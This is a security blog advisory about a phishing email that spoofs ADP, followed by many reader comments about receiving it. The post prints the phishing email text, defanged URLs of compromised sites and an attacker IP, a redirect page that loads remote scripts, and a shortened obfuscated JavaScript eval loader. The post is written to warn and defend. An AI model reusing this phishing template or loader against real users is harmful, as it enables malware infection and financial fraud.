Emails with subject “ADP Funding Notification – Debit Draft” are a security risk


MX Lab, http://www.mxlab.eu, has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.

The email is send from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The URL will not lead you to the site that is mentioned but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js”></script>
<script type=”text/javascript” src=”hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js”></script>

</html>

Both embedded Javascript URLs will redirect you document.location=’hxxp://173.255.228.171/getfile.php?u=853fda24′;

At this location, the obfuscated Javascript is present while showing in the browser “Waiting for redirect…”.

<html><body><script>try{v=prototype&5;}catch(v){x=1;}z=function(){md=”a”;if(window.document)e=”ev”;c=””;f=”fromChar”;
if(a)f=f+”Code”;
d=10;
for(i=15027-1;i>=0;i–){
w=i;
v=a[w];
k=v/((15027-i-1)%d+2);
c+=String[f](k);
}
e+=”al”;
if(x)window[e](c);}
g=””;
if(x)g+=”472.287.240.240.432.336.230.1375.590.369.384.336.288.280.176.348.198.1111.
1140.945.800.707.684.475.4″
______SHORTENED_____
if(x)g+=”07.654.585.396.333.200″;
a=g.split(“.”);
z(123);
</script></body></htm>

104 thoughts on “Emails with subject “ADP Funding Notification – Debit Draft” are a security risk

  1. got this message today. the spooky part is they emailed me and cc’d my business partner so it took some smarts to put all that together.

  2. thanks for the info. I received 2 emails within 30 minutes of each other. Thankfully my malware would not let me access the website.

    • I also received this on 29/9/2012 and they also debited our business account on the 4th October 2012 and I am now trying to get them to put the money back. never signed up for this either.

      • Guys please tell me will they actually debit my account, anyone there who lost money due to this silly thing? am going to run to the bank & transfer my money to another account OMG am so freaked out. We don’t have privacy in this cruel world😦

      • I have received this email today 13/10/12 on my iPad and it is a weekend however am freaked out as to whether they will take money from my account. I have never heard of these people. Who do I report this to?

      • I received this on October 15 and they managed to take $175.00 from my checking account. I disputed it with my bank and after checking they say it is “legitimate”, but I am contesting that and requiring them to send me the documentation. This is a nightmare. I think I should change my checking account because I’m afraid it will happen again monthly every month on the 15th? Has anyone had any luck getting their bank to reverse these charges permanently. Fifth Third only reversed it for 30 days then put it back on again when they said it was “legitimate.” Bulls^*#( this was NEVER authorized by me.

  3. I wanted to say thanks as well. I suspected it to be a phishing email, but it’s nice to be able to get such quick validation through sites like this.

  4. This is what I love about the internet. I just got one of these and the watchdogs are already on it. Thanks

  5. My ADP Email had the subject-line. ADP Generated Message: First Notice – Digital Certificate Expiration. I am relieved to find this support site. I still don’t know how to truly avoid these invaders as they become more and more sneaky in faking an authentic-looking address.

  6. this went into our regular email as ADPClientServices, did not look right so I called ADP directly I was informed they would never send an email with another link it would be directly to their website. SO Delete, Delete, Delete!

  7. got a similar email today @ 3.17 p.m. Searcehd internet and found this discussion. Thanks to everybody who has posted. It does help a lot in weeding out the spam emails.

  8. Is there an address to forward these spam e-mails to? I get them quite frequently, from PayPal too. They have me forward the fraudulent messages to “Spoof@paypal.com”

  9. I am glad I decided to Google who ADP was. I got this email on an infrequently used email so when it said it was going to debit my account, I was suspicious but didn’t want to click the link before checking out who the company was. Thank you posting this!

  10. I received one today as well, but realized it was a bogus email when I opened the “show details” and saw that it was sent to other emails that started with “gina”. googled the site and brought here. thank you.

  11. I just received an email to my .mac account. Got concerned so did some research. Thank you for those who did all the research before I had to. I’m sick of these spammers. How do we stop the madness?

    • I received one email from them today and I read your post that help me to know that it is a SPAM but I don’t know wich account could be debited if I didn’t subscribe on anything with them… Is it only if you click on their link ? Is it on a credit card account or a bank account ? Thank you !

  12. Thank you all for posting this answer. I had just recieved the same email. I kinda figured it was a phishing scam so I Googled it before opening it and was happy to see all the post. Thanks!

    Reply

  13. I also got one today…scary thing is I did have an ADP account through work but this email went straight to my spam box. Gonna forward it as well. Thanks for the info

  14. Had 2 of these spams in the past few days. One with Subject line “Debit Draft”, and the other “ADP Generated Message – Debit Draft”. Thanks for confirming my suspicions!

  15. I have received many of these messages in recent days to I have not done them case; But today I get other BBB where tell me that my business has a complaint for failure to pay the ADP service.

  16. I have received this email. Thankfully I googled it and found this site. Have deleted message now.
    Many thanks/
    Dave

  17. I’m getting three or four a day now, all from America, I been downgraded on their business ratings and now offered diplomas How can we stop these, I’m not sure how to block E-mails and my ESP are no help

  18. Also got this message twice In my spam mail. Never signed up for this! Will keep watch on my bank account for this just to be safe!

  19. Today I received the same message from ‘ADP Alert ‘ with the following body:

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking
    business day for the amount(s) shown on the report(s).

    Please do not respond or reply to this automated e-mail. If you have any
    questions or comments, please Contact your ADP Benefits Specialist.

    Thank You,
    ADP Benefit Services

    Should I inform to bank.

  20. iyi günler arkadaşlar.bana aynı mesajlardan geldi.benim banka hesabım olduğunu söylüyorlar.para çekileceğini söylüyorlar.bu nedeir.bu konuda ne dersiniz.selamlar..

  21. Scary isn’t it. It appears we dont touch it, straight up delete … single digit finger high in the air, to the swine that got our details to send. I’m glad I searched here first. I live on the same road, wondering what knowledge they have of my banking details and whether I should notify the bank. I’ll watch for someones savvy reply.

  22. Yea…. got the same here … but was in my spam folder
    with this message attached:
    “Be careful with this message. Our systems couldn’t verify that this message was really sent by cparkerproperties.com. You might want to avoid clicking on links or replying with personal information. Learn more”

    so googled “https://www.flexdirect.adp.com” and came up with these notifications……

    looks like they are using various email addys to send now/……….
    r

  23. ADP does our payroll, and it was sent to my work email, which I don’t share anywhere but professional sites, so this was concerning. Now I wonder which company is “leaking” my contact info😦

  24. I got the same e-mail.. but I clicked the link that sites on my mobile phone… is it okay? I am so nervous..:(

  25. I just received this email today and I’m so glad I googled it. Thank you. Immediately deleted it and added seller to spam.

  26. I received this today as well and have never had anything to do with ADP – I don’t even live in America. This is clearly spam/phishing attempts so it got deleted straight away, but it is rather scary how these people find and target you… Googled ADP however and it led me here, so thanks for the information. Be safe on the Internet.

  27. Yeah great work all, I poked around after getting this as well. They almost got me too because I just put in for a small business loan and I thought it had something to do with that lol always pays to look first!!

    • To all those worried about their bank accounts, from this email I would not worry. If they did already have your bank information they would not require you to click a link, they would just pretend to be some fake company and do an ACH withdraw on your account. Just be careful and google/delete any email that seem a little shady!

      • I would definitely worry if I were you. I got the fake email and clicked on it because my previous employer used ADP so I thought it was legit. I’ve had $175.00 take “automatically debit” from my checking account in October. Did a “dispute” with my bank (Fifth Third) and they reversed it for 30 days while checking into it. Then they reversed it again and re-debited my account for the $175.00 because they said it was legit. I’m further disputing and asking for documentation. This is a nightmare!

  28. I clicked on the link like an idiot, and immediately disconnected from the internet and ran my virus scan which has found nothing. I then searched the internet and found you… I should have searched first…

  29. I got this also but gmail put it directly in the span and listed it with a warning. The warning directly mentioned not clicking any links in the email lol. I wouldn’t anyhow I didn’t recognize it and if they charged the bank I could easily dispute the charges anyhow.

  30. I got this mail twice today. Please can anyone tell me, will they really debit my account?? I haven’t signed up for this & have never heard of or dealt with ADP before! There’s a link also but I didn’t click on it

  31. Thanks for this site , a lot of people are scammed, but because of your dedication we can stay away from this kind of nonsense.. I am usually very careful and would not open emails that do not make sense..
    KUDOS people!!!!!

  32. Received this spam today. This is work email account and the only thing I have used it for lately was to post a job on Craigslist. ???????????????????
    Thanks for your help.

  33. I received this email today and clicked on the link, don’t know what iwas thinking as I never open emails that I don’t trust, hope it does not take anything from my account

  34. Received a modified version this morning: 2 emails with “ADP Funding Notification” and “ADP Debit Draft” subject lines. The source and hyperlinks are different but essentially the same issue. Both display a hyperlink of “https://www.flexdirect.adp.com/client/login.aspx” but actually link to “hxxp://www.annorlimousine.com/4b2kMN/index.html” and “hxxp://daglimobilya.com/7dc5WT/index.html” respectively. I copy and paste links, I NEVER click a link in an email, especially one that is questionable. I contacted ADP and while on hold, found this blog and then they answered to confirm many have received such emails. This email originated from 109.93.41.77 (Serbia) according to the message header.

  35. I’ve just got one too. I got worried not knowing who the company was and or how much was being debited from my account i clicked the link and it said ‘server’ in the top left corner so I clicked for the properties and it looked dodgy, was out ouf date and wouldn’t show certificates so I’ve glosed it and googled it and came to this site… thanks very much everyone.
    Does anyone know if im at risk because i clicked the link even though it didn’t load??

    • I just got one if these in my junk mail. Totally confused as ADP is the name of my dentist! Clicked in link on my phone it came up forbidden. Thank god. I googled and found these comments. Thanks all for posting.

    • @SaraCornell It fell into my Gmail spam folder but I looked at it in any case. Suspicions instantly raised by the lack of addressee or signature. Quick tip – copy and paste a key phrase of many words from the email and google it (perhaps adding the word “spam” to the search argument) if you’re uncertain – such action will lead you straight to sites like this one that help. I googled the link itself(!) and got this page. Quick tip number 2 – don’t click on links. Quick tip 3 – if your malware/AV scanner didn’t block the link, run a malware scan *now* from http://www.microsoft.com/security/scanner/en-gb/default.aspx (don’t trust this link? – search for “Microsoft Safety Scanner”) and upgrade your system to an AV/malware app that does work. ATB @PedroStephano

  36. Well now , nice to know we are not alone when problems hit us. However at 74 I still got me marbles and can punch these sort of things into touch, whilst not using the queens english .
    Thanks to this site set up I can refer my friends to check anything that is suspicious. Many thanks Google.

  37. Just got one today, too. I don’t even know who ADP is. I will be going to my bank tomorrow morning to let them know to watch out for these nuts who are trying to steal my hard-earned money. This makes me nervous and angry!!! How dare they??? I am glad I found you all through Google. What a mess!!

  38. Just like many others on this page I received one of these emails today. Googled it and and found you guys. Thanks for confirming my suspicions! Great site.

  39. Received this today, opened, and after seeing that I was forbidden to open link, decided to search. Am I at risk? My credit unions are closed today, except for drive-thru…do I print this out and take it to them??? Do I have to worry about my tiny bank account? They’ll be pretty disappointed when they see what’s in there?? Do they want my last $10.00?? I also received an e-mail from “Wire Transfer Confirmation (FED_7811t33836)….is this related??

  40. I received same on 12th October & left in “Junk”. Didn’t do anything with it until today. Googled & found you, so have deleted without going to link. Thanks for the info.

  41. Received 2 emails on this ADP Funding Notification which I am not familiar with. I have called my bank and apparently they are aslo not sure about this ADP Funding Notification. My advice to delete and totally ignore this email.

  42. Same here, got one yesterday and did not click on anything. First thing this morning, notified my bank to NOT actuate any transaction without my specific consent. They had never heard of this spam. Glad I found this site when I googled the ADPClient Services. Pheew!!

  43. Thanks to the person/persons who set up this site and to everyone who posted about ADP e-mail. I found it in my spam folder and as in the middle of setting up a business and dealing with a lot of stuff thought a ‘proper’ message had slipped into spam folder. Stupidly (specially stupid of me as I’m an IT contractor!!) cllicked on the link and thankfully got internet can’t open this page message – phew! Googled and found this site.

  44. hello,

    I opened this message and tried to reply but bounced back….I am now concerned that someone may have my details is this possible?? esp if it bounced back.

    the email contained adp will be debiting my account within one working day can someone help?

  45. This is the one that I got…
    Your latest ADP Services Invoice is now available to view or pay online at ADP Online Invoice Management .

    To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management Account.

    Total amount due by October 11, 2012

    $42571.85

    If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.

    Questions about your bill?

    Contact your ADP administrator by Secure Mail.

    Note: This is an automated email. Please do not reply.

    They don’t have to worry about me replying…..or paying either!! Sure hope that nobody gets duped by this

  46. Just go that email–although when I hovered over the link, it went to some wholesaleshoewarehouse dot something.. I didn’t click of course!!

  47. Well..I recieved mine on Oct 12 and decided to clean my mailbox this morning before work. I, like an idiot clicked it cause I couldn’t figure out what amt they were talking about becasue I hadn’t transfered any money for about 3 weeks. The page that came up was a “page cannot be found” page. So I hope I am safe here. I’m usually not that stupid….but that’s what happens when you clean your box at 5 a.m. and forget to have coffee first. Thanks to the watchdogs Debbie Vancouver Island Canada

  48. we got one in Oct. Didn’t lose anything. There are so many bad people. Glad I found you today.

  49. I just got one of these on my work email. I have never signed up for this, so how do I know if my account is okay? I did not click on the link so they have no valuable information as far as I know. Should I email my bank?

Comments are closed.